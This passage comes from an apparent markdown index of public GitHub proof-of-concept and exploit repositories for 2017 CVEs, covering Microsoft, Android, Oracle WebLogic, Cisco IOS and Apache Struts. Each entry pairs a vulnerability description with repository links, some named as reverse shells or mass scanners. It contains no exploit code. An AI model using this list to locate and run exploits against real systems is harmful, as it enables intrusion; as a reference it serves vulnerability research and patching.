SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to bypass the Office Protected View via a specially crafted document, aka "Microsoft Office Security Feature Bypass Vulnerability." + + +- [ryhanson/CVE-2017-0204](https://github.com/ryhanson/CVE-2017-0204) + +### CVE-2017-0213 (2017-05-12) + +Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214. + + +- [shaheemirza/CVE-2017-0213-](https://github.com/shaheemirza/CVE-2017-0213-) +- [zcgonvh/CVE-2017-0213](https://github.com/zcgonvh/CVE-2017-0213) +- [billa3283/CVE-2017-0213](https://github.com/billa3283/CVE-2017-0213) +- [likekabin/CVE-2017-0213](https://github.com/likekabin/CVE-2017-0213) +- [jbooz1/CVE-2017-0213](https://github.com/jbooz1/CVE-2017-0213) +- [eonrickity/CVE-2017-0213](https://github.com/eonrickity/CVE-2017-0213) +- [Anonymous-Family/CVE-2017-0213](https://github.com/Anonymous-Family/CVE-2017-0213) + +### CVE-2017-0248 (2017-05-12) + +Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to bypass Enhanced Security Usage taggings when they present a certificate that is invalid for a specific use, aka ".NET Security Feature Bypass Vulnerability." + + +- [rubenmamo/CVE-2017-0248-Test](https://github.com/rubenmamo/CVE-2017-0248-Test) + +### CVE-2017-0261 (2017-05-12) + +Microsoft Office 2010 SP2, Office 2013 SP1, and Office 2016 allow a remote code execution vulnerability when the software fails to properly handle objects in memory, aka "Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0262 and CVE-2017-0281. + + +- [kcufId/eps-CVE-2017-0261](https://github.com/kcufId/eps-CVE-2017-0261) +- [erfze/CVE-2017-0261](https://github.com/erfze/CVE-2017-0261) + +### CVE-2017-0263 (2017-05-12) + +The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability." + + +- [R06otMD5/cve-2017-0263-poc](https://github.com/R06otMD5/cve-2017-0263-poc) + +### CVE-2017-0290 (2017-05-09) + +The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 does not properly scan a specially crafted file leading to memory corruption, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability." + + +- [homjxi0e/CVE-2017-0290-](https://github.com/homjxi0e/CVE-2017-0290-) + +### CVE-2017-0358 (2018-04-13) + +Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. + + +- [Wangsafz/cve-2017-0358.sh](https://github.com/Wangsafz/cve-2017-0358.sh) + +### CVE-2017-0411 (2017-02-08) + +An elevation of privilege vulnerability in the Framework APIs could enable a local malicious application to execute arbitrary code within the context of a privileged process. This issue is rated as High because it could be used to gain local access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 7.0, 7.1.1. Android ID: A-33042690. + + +- [lulusudoku/PoC](https://github.com/lulusudoku/PoC) + +### CVE-2017-0478 (2017-03-08) + +A remote code execution vulnerability in the Framesequence library could enable an attacker using a specially crafted file to execute arbitrary code in the context of an unprivileged process. This issue is rated as High due to the possibility of remote code execution in an application that uses the Framesequence library. Product: Android. Versions: 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33718716. + + +- [bingghost/CVE-2017-0478](https://github.com/bingghost/CVE-2017-0478) +- [likekabin/CVE-2017-0478](https://github.com/likekabin/CVE-2017-0478) + +### CVE-2017-0505 (2017-03-08) + +An elevation of privilege vulnerability in MediaTek components, including the M4U driver, sound driver, touchscreen driver, GPU driver, and Command Queue driver, could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: N/A. Android ID: A-31822282. References: M-ALPS02992041. + + +- [R0rt1z2/CVE-2017-0505-mtk](https://github.com/R0rt1z2/CVE-2017-0505-mtk) + +### CVE-2017-0541 (2017-04-07) + +A remote code execution vulnerability in sonivox in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing. This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-34031018. + + +- [C0dak/CVE-2017-0541](https://github.com/C0dak/CVE-2017-0541) +- [likekabin/CVE-2017-0541](https://github.com/likekabin/CVE-2017-0541) + +### CVE-2017-0554 (2017-04-07) + +An elevation of privilege vulnerability in the Telephony component could enable a local malicious application to access capabilities outside of its permission levels. This issue is rated as Moderate because it could be used to gain access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33815946. + + +- [lanrat/tethr](https://github.com/lanrat/tethr) + +### CVE-2017-0564 (2017-04-07) + +An elevation of privilege vulnerability in the kernel ION subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-34276203. + + +- [guoygang/CVE-2017-0564-ION-PoC](https://github.com/guoygang/CVE-2017-0564-ION-PoC) + +### CVE-2017-0781 (2017-09-14) + +A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146105. + + +- [ojasookert/CVE-2017-0781](https://github.com/ojasookert/CVE-2017-0781) +- [X3eRo0/android712-blueborne](https://github.com/X3eRo0/android712-blueborne) +- [mjancek/BlueborneDetection](https://github.com/mjancek/BlueborneDetection) +- [CrackSoft900/Blue-Borne](https://github.com/CrackSoft900/Blue-Borne) +- [CarlosDelRosario7/sploit-bX](https://github.com/CarlosDelRosario7/sploit-bX) +- [DamianSuess/Learn.BlueJam](https://github.com/DamianSuess/Learn.BlueJam) + +### CVE-2017-0785 (2017-09-14) + +A information disclosure vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146698. + + +- [ojasookert/CVE-2017-0785](https://github.com/ojasookert/CVE-2017-0785) +- [aymankhalfatni/CVE-2017-0785](https://github.com/aymankhalfatni/CVE-2017-0785) +- [Alfa100001/-CVE-2017-0785-BlueBorne-PoC](https://github.com/Alfa100001/-CVE-2017-0785-BlueBorne-PoC) +- [Hackerscript/BlueBorne-CVE-2017-0785](https://github.com/Hackerscript/BlueBorne-CVE-2017-0785) +- [pieterbork/blueborne](https://github.com/pieterbork/blueborne) +- [sigbitsadmin/diff](https://github.com/sigbitsadmin/diff) +- [RavSS/Bluetooth-Crash-CVE-2017-0785](https://github.com/RavSS/Bluetooth-Crash-CVE-2017-0785) +- [sh4rknado/BlueBorn](https://github.com/sh4rknado/BlueBorn) +- [Joanmei/CVE-2017-0785](https://github.com/Joanmei/CVE-2017-0785) +- [CyberKimathi/Py3-CVE-2017-0785](https://github.com/CyberKimathi/Py3-CVE-2017-0785) +- [MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-](https://github.com/MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-) + +### CVE-2017-0806 (2017-10-03) + +An elevation of privilege vulnerability in the Android framework (gatekeeperresponse). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-62998805. + + +- [michalbednarski/ReparcelBug](https://github.com/michalbednarski/ReparcelBug) + +### CVE-2017-0807 (2017-10-03) + +An elevation of privilege vulnerability in the Android framework (ui framework). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2. Android ID: A-35056974. + + +- [kpatsakis/PoC_CVE-2017-0807](https://github.com/kpatsakis/PoC_CVE-2017-0807) + +### CVE-2017-75 +- [CalebFIN/EXP-CVE-2017-75](https://github.com/CalebFIN/EXP-CVE-2017-75) + +### CVE-2017-1235 (2017-09-25) + +IBM WebSphere MQ 8.0 could allow an authenticated user to cause a premature termination of a client application thread which could potentially cause denial of service. IBM X-Force ID: 123914. + + +- [11k4r/CVE-2017-1235_exploit](https://github.com/11k4r/CVE-2017-1235_exploit) + +### CVE-2017-1635 (2017-12-13) + +IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243. + + +- [emcalv/tivoli-poc](https://github.com/emcalv/tivoli-poc) +- [bcdannyboy/cve-2017-1635-PoC](https://github.com/bcdannyboy/cve-2017-1635-PoC) + +### CVE-2017-2368 (2017-02-20) + +An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. The issue involves the "Contacts" component. It allows remote attackers to cause a denial of service (application crash) via a crafted contact card. + + +- [vincedes3/CVE-2017-2368](https://github.com/vincedes3/CVE-2017-2368) + +### CVE-2017-2370 (2017-02-20) + +An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app. + + +- [maximehip/extra_recipe](https://github.com/maximehip/extra_recipe) +- [JackBro/extra_recipe](https://github.com/JackBro/extra_recipe) +- [Rootkitsmm-zz/extra_recipe-iOS-10.2](https://github.com/Rootkitsmm-zz/extra_recipe-iOS-10.2) +- [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370) + +### CVE-2017-2388 (2017-04-02) + +An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "IOFireWireFamily" component. It allows attackers to cause a denial of service (NULL pointer dereference) via a crafted app. + + +- [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref) + +### CVE-2017-2636 (2017-03-07) + +Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline. + + +- [alexzorin/cve-2017-2636-el](https://github.com/alexzorin/cve-2017-2636-el) + +### CVE-2017-2666 (2018-07-27) + +It was discovered in Undertow that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own. + + +- [tafamace/CVE-2017-2666](https://github.com/tafamace/CVE-2017-2666) + +### CVE-2017-2671 (2017-04-05) + +The ping_unhash function in net/ipv4/ping.c in the Linux kernel through 4.10.8 is too late in obtaining a certain lock and consequently cannot ensure that disconnect function calls are safe, which allows local users to cause a denial of service (panic) by leveraging access to the protocol value of IPPROTO_ICMP in a socket system call. + + +- [homjxi0e/CVE-2017-2671](https://github.com/homjxi0e/CVE-2017-2671) + +### CVE-2017-2741 (2018-01-23) + +A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code. + + +- [dopheide-esnet/zeek-jetdirect](https://github.com/dopheide-esnet/zeek-jetdirect) + +### CVE-2017-2751 (2018-10-03) + +A BIOS password extraction vulnerability has been reported on certain consumer notebooks with firmware F.22 and others. The BIOS password was stored in CMOS in a way that allowed it to be extracted. This applies to consumer notebooks launched in early 2014. + + +- [BaderSZ/CVE-2017-2751](https://github.com/BaderSZ/CVE-2017-2751) + +### CVE-2017-2793 (2017-05-23) + +An exploitable heap corruption vulnerability exists in the UnCompressUnicode functionality of Antenna House DMC HTMLFilter used by MarkLogic 8.0-6. A specially crafted xls file can cause a heap corruption resulting in arbitrary code execution. An attacker can send/provide malicious XLS file to trigger this vulnerability. + + +- [sUbc0ol/Detection-for-CVE-2017-2793](https://github.com/sUbc0ol/Detection-for-CVE-2017-2793) + +### CVE-2017-2824 (2017-05-24) + +An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability. + + +- [listenquiet/cve-2017-2824-reverse-shell](https://github.com/listenquiet/cve-2017-2824-reverse-shell) + +### CVE-2017-2903 (2018-04-24) + +An exploitable integer overflow exists in the DPX loading functionality of the Blender open-source 3d creation suite version 2.78c. A specially crafted '.cin' file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can convince a user to use the file as an asset via the sequencer in order to trigger this vulnerability. + + +- [SpiralBL0CK/dpx_work_CVE-2017-2903](https://github.com/SpiralBL0CK/dpx_work_CVE-2017-2903) + +### CVE-2017-3000 (2017-03-14) + +Adobe Flash Player versions 24.0.0.221 and earlier have a vulnerability in the random number generator used for constant blinding. Successful exploitation could lead to information disclosure. + + +- [dangokyo/CVE-2017-3000](https://github.com/dangokyo/CVE-2017-3000) + +### CVE-2017-3066 (2017-04-27) + +Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution. + + +- [codewhitesec/ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) +- [cucadili/CVE-2017-3066](https://github.com/cucadili/CVE-2017-3066) + +### CVE-2017-3078 (2017-06-20) + +Adobe Flash Player versions 25.0.0.171 and earlier have an exploitable memory corruption vulnerability in the Adobe Texture Format (ATF) module. Successful exploitation could lead to arbitrary code execution. + + +- [homjxi0e/CVE-2017-3078](https://github.com/homjxi0e/CVE-2017-3078) + +### CVE-2017-3143 (2019-01-16) + +An attacker who is able to send and receive messages to an authoritative DNS server and who has knowledge of a valid TSIG key name for the zone and service being targeted may be able to manipulate BIND into accepting an unauthorized dynamic update. Affects BIND 9.4.0->9.8.8, 9.9.0->9.9.10-P1, 9.10.0->9.10.5-P1, 9.11.0->9.11.1-P1, 9.9.3-S1->9.9.10-S2, 9.10.5-S1->9.10.5-S2. + + +- [saaph/CVE-2017-3143](https://github.com/saaph/CVE-2017-3143) + +### CVE-2017-3164 (2019-03-08) + +Server Side Request Forgery in Apache Solr, versions 1.3 until 7.6 (inclusive). Since the "shards" parameter does not have a corresponding whitelist mechanism, a remote attacker with access to the server could make Solr perform an HTTP GET request to any reachable URL. + + +- [tdwyer/PoC_CVE-2017-3164_CVE-2017-1262](https://github.com/tdwyer/PoC_CVE-2017-3164_CVE-2017-1262) + +### CVE-2017-3241 (2017-01-27) + +Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111; JRockit: R28.3.12. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). + + +- [xfei3/CVE-2017-3241-POC](https://github.com/xfei3/CVE-2017-3241-POC) +- [scopion/CVE-2017-3241](https://github.com/scopion/CVE-2017-3241) + +### CVE-2017-3248 (2017-01-27) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS v3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). + + +- [ianxtianxt/CVE-2017-3248](https://github.com/ianxtianxt/CVE-2017-3248) +- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner) +- [BabyTeam1024/CVE-2017-3248](https://github.com/BabyTeam1024/CVE-2017-3248) + +### CVE-2017-3506 (2017-04-24) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N). + + +- [ianxtianxt/CVE-2017-3506](https://github.com/ianxtianxt/CVE-2017-3506) +- [Al1ex/CVE-2017-3506](https://github.com/Al1ex/CVE-2017-3506) + +### CVE-2017-3599 (2017-04-24) + +Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet. + + +- [SECFORCE/CVE-2017-3599](https://github.com/SECFORCE/CVE-2017-3599) +- [jptr218/mysql_dos](https://github.com/jptr218/mysql_dos) + +### CVE-2017-3730 (2017-05-04) + +In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this can result in the client attempting to dereference a NULL pointer leading to a client crash. This could be exploited in a Denial of Service attack. + + +- [olivierh59500/CVE-2017-3730](https://github.com/olivierh59500/CVE-2017-3730) + +### CVE-2017-3881 (2017-03-17) + +A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. + + +- [artkond/cisco-rce](https://github.com/artkond/cisco-rce) +- [homjxi0e/CVE-2017-3881-exploit-cisco-](https://github.com/homjxi0e/CVE-2017-3881-exploit-cisco-) +- [homjxi0e/CVE-2017-3881-Cisco](https://github.com/homjxi0e/CVE-2017-3881-Cisco) +- [mzakyz666/PoC-CVE-2017-3881](https://github.com/mzakyz666/PoC-CVE-2017-3881) +- [1337g/CVE-2017-3881](https://github.com/1337g/CVE-2017-3881) + +### CVE-2017-4490 +- [homjxi0e/CVE-2017-4490-](https://github.com/homjxi0e/CVE-2017-4490-) +- [homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-](https://github.com/homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-) + +### CVE-2017-4878 +- [brianwrf/CVE-2017-4878-Samples](https://github.com/brianwrf/CVE-2017-4878-Samples) + +### CVE-2017-4971 (2017-06-13) + +An issue was discovered in Pivotal Spring Web Flow through 2.4.4. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings. + + +- [cved-sources/cve-2017-4971](https://github.com/cved-sources/cve-2017-4971) + +### CVE-2017-5005 (2017-01-02) + +Stack-based buffer overflow in Quick Heal Internet Security 10.1.0.316 and earlier, Total Security 10.1.0.316 and earlier, and AntiVirus Pro 10.1.0.316 and earlier on OS X allows remote attackers to execute arbitrary code via a crafted LC_UNIXTHREAD.cmdsize field in a Mach-O file that is mishandled during a Security Scan (aka Custom Scan) operation. + + +- [payatu/QuickHeal](https://github.com/payatu/QuickHeal) + +### CVE-2017-5007 (2017-02-17) + +Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled the sequence of events when closing a page, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. + + +- [Ang-YC/CVE-2017-5007](https://github.com/Ang-YC/CVE-2017-5007) + +### CVE-2017-5123 (2021-11-02) + +Insufficient data validation in waitid allowed an user to escape sandboxes on Linux. + + +- [FloatingGuy/CVE-2017-5123](https://github.com/FloatingGuy/CVE-2017-5123) +- [0x5068656e6f6c/CVE-2017-5123](https://github.com/0x5068656e6f6c/CVE-2017-5123) +- [Synacktiv-contrib/exploiting-cve-2017-5123](https://github.com/Synacktiv-contrib/exploiting-cve-2017-5123) +- [teawater/CVE-2017-5123](https://github.com/teawater/CVE-2017-5123) +- [c3r34lk1ll3r/CVE-2017-5123](https://github.com/c3r34lk1ll3r/CVE-2017-5123) +- [h1bAna/CVE-2017-5123](https://github.com/h1bAna/CVE-2017-5123) + +### CVE-2017-5124 (2018-02-07) + +Incorrect application of sandboxing in Blink in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted MHTML page. + + +- [Bo0oM/CVE-2017-5124](https://github.com/Bo0oM/CVE-2017-5124) + +### CVE-2017-5223 (2017-01-16) + +An issue was discovered in PHPMailer before 5.2.22. PHPMailer's msgHTML method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using a script-provided base directory. If no base directory is provided, it resolves to /, meaning that relative image URLs get treated as absolute local file paths and added as attachments. To form a remote vulnerability, the msgHTML method must be called, passed an unfiltered, user-supplied HTML document, and must not set a base directory. + + +- [cscli/CVE-2017-5223](https://github.com/cscli/CVE-2017-5223) + +### CVE-2017-5415 (2018-06-11) + +An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by "blob:" as the protocol, leading to user confusion and further spoofing attacks. This vulnerability affects Firefox < 52. + + +- [649/CVE-2017-5415](https://github.com/649/CVE-2017-5415) + +### CVE-2017-5487 (2017-01-15) + +wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. + + +- [teambugsbunny/wpUsersScan](https://github.com/teambugsbunny/wpUsersScan) +- [R3K1NG/wpUsersScan](https://github.com/R3K1NG/wpUsersScan) +- [GeunSam2/CVE-2017-5487](https://github.com/GeunSam2/CVE-2017-5487) +- [patilkr/wp-CVE-2017-5487-exploit](https://github.com/patilkr/wp-CVE-2017-5487-exploit) +- [zkhalidul/GrabberWP-CVE-2017-5487](https://github.com/zkhalidul/GrabberWP-CVE-2017-5487) +- [SeasonLeague/CVE-2017-5487](https://github.com/SeasonLeague/CVE-2017-5487) +- [Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM](https://github.com/Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM) +- [K3ysTr0K3R/CVE-2017-5487-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-5487-EXPLOIT) +- [dream434/CVE-2017-5487](https://github.com/dream434/CVE-2017-5487) + +### CVE-2017-5633 (2017-03-06) + +Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524 Wireless Router with firmware 9.01 allow remote attackers to (1) change the admin password, (2) reboot the device, or (3) possibly have unspecified other impact via crafted requests to CGI programs. + + +- [cardangi/Exploit-CVE-2017-5633](https://github.com/cardangi/Exploit-CVE-2017-5633) + +### CVE-2017-5638 (2017-03-11) + +The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. + + +- [PolarisLab/S2-045](https://github.com/PolarisLab/S2-045) +- [Flyteas/Struts2-045-Exp](https://github.com/Flyteas/Struts2-045-Exp) +- [bongbongco/cve-2017-5638](https://github.com/bongbongco/cve-2017-5638) +- [jas502n/S2-045-EXP-POC-TOOLS](https://github.com/jas502n/S2-045-EXP-POC-TOOLS) +- [mthbernardes/strutszeiro](https://github.com/mthbernardes/strutszeiro) +- [xsscx/cve-2017-5638](https://github.com/xsscx/cve-2017-5638) +- [immunio/apache-struts2-CVE-2017-5638](https://github.com/immunio/apache-struts2-CVE-2017-5638) +- [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve) +- [aljazceru/CVE-2017-5638-Apache-Struts2](https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2) +- [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638) +- [jrrombaldo/CVE-2017-5638](https://github.com/jrrombaldo/CVE-2017-5638) +- [random-robbie/CVE-2017-5638](https://github.com/random-robbie/CVE-2017-5638) +- [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts) +- [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn) +- [ret2jazzy/Struts-Apache-ExploitPack](https://github.com/ret2jazzy/Struts-Apache-ExploitPack) +- [lolwaleet/ExpStruts](https://github.com/lolwaleet/ExpStruts) +- [oktavianto/CVE-2017-5638-Apache-Struts2](https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2) +- [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638) +- [opt9/Strutshock](https://github.com/opt9/Strutshock) +- [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell) +- [bhagdave/CVE-2017-5638](https://github.com/bhagdave/CVE-2017-5638) +- [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC) +- [gsfish/S2-Reaper](https://github.com/gsfish/S2-Reaper) +- [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638) +- [opt9/Strutscli](https://github.com/opt9/Strutscli) +- [tahmed11/strutsy](https://github.com/tahmed11/strutsy) +- [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638) +- [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp) +- [SpiderMate/Stutsfi](https://github.com/SpiderMate/Stutsfi) +- [jpacora/Struts2Shell](https://github.com/jpacora/Struts2Shell) +- [AndreasKl/CVE-2017-5638](https://github.com/AndreasKl/CVE-2017-5638) +- [riyazwalikar/struts-rce-cve-2017-5638](https://github.com/riyazwalikar/struts-rce-cve-2017-5638) +- [homjxi0e/CVE-2017-5638](https://github.com/homjxi0e/CVE-2017-5638) +- [eeehit/CVE-2017-5638](https://github.com/eeehit/CVE-2017-5638) +- [sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) +- [sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638](https://github.com/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638) +- [R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-](https://github.com/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-) +- [Xhendos/CVE-2017-5638](https://github.com/Xhendos/CVE-2017-5638) +- [TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) +- [invisiblethreat/strutser](https://github.com/invisiblethreat/strutser) +- [lizhi16/CVE-2017-5638](https://github.com/lizhi16/CVE-2017-5638) +- [c002/Apache-Struts](https://github.com/c002/Apache-Struts) +- 